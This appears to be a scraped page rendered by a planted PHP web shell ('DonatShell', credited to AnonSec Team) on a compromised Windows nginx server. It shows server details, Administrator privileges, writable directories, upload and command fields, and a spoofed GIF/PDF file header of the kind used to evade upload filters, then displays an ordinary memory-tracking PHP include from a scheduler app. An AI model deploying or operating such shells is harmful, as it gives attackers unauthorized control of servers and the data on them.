GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 134.29.175.74  /  Your IP : 216.73.216.160
Web Server : nginx/1.10.2
System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586
User : Administrator ( 0)
PHP Version : 7.1.0
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/nginx/html/Scheduler/common/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : C:/nginx/html/Scheduler/common/memoryTrack.phpinc
<?
// common/memoryTrack.phpinc
// Track memory usage.

t_Begin(); // Begin TRACKing included file.

/** /
unset($_SESSION['memory']); unset($_SESSION['memoryindex']);
/**/
if (!isset($_SESSION['memory'])) {
  $_SESSION['memory'] = array();
  $_SESSION['memory']['start'] = number_format(memory_get_usage())."-".number_format(memory_get_peak_usage(true));
  $_SESSION['memory']['count'] = 0;
}
$_SESSION['memory']['now'] = number_format(memory_get_usage())."-".number_format(memory_get_peak_usage(true));
$_SESSION['memory']['count']++;
$backtrace = debug_backtrace();
if ( isset($backtrace['0']['file']) ) {
  $thisFile = $backtrace['0']['file'];
  $thisLine = $backtrace['0']['line'];
} else {
  $thisFile = 'unknown';
  $thisLine = 'n/a';
}
#d_Var('$backtrace',$backtrace,'+');
?>
<table>
  <tr>
    <td colspan="2" class="center">Memory Usage Track from <?=basename($thisFile)?>:<?=$thisLine?> #<?=$_SESSION['memory']['count']?>.<br><span class="d_s_fp"><?=$thisFile?></span></td>
  </tr>
  <tr>
    <td class="right">Starting memory usage:</td>
    <td class="number"><?=($_SESSION['memory']['start'])?></td>
  </tr>
<?
if ($_SESSION['memory']['start'] != $_SESSION['memory']['now']) {
?>
  <tr>
    <td class="right">Current memory usage:</td>
    <td class="number"><?=($_SESSION['memory']['now'])?></td>
  </tr>
  <tr>
    <td class="right">Memory limit:</td>
    <td class="number"><?=number_format((int)(ini_get('memory_limit'))*1024*1024)?></td>
  </tr>
<?
}
?>
</table>
<?
// Save memory!
#if ( isset($_SESSION['TRACK']) ) unset($_SESSION['TRACK']);
t_End(false, __FILE__, __LINE__); // End TRACKing included file.
?>

Anon7 - 2022
AnonSec Team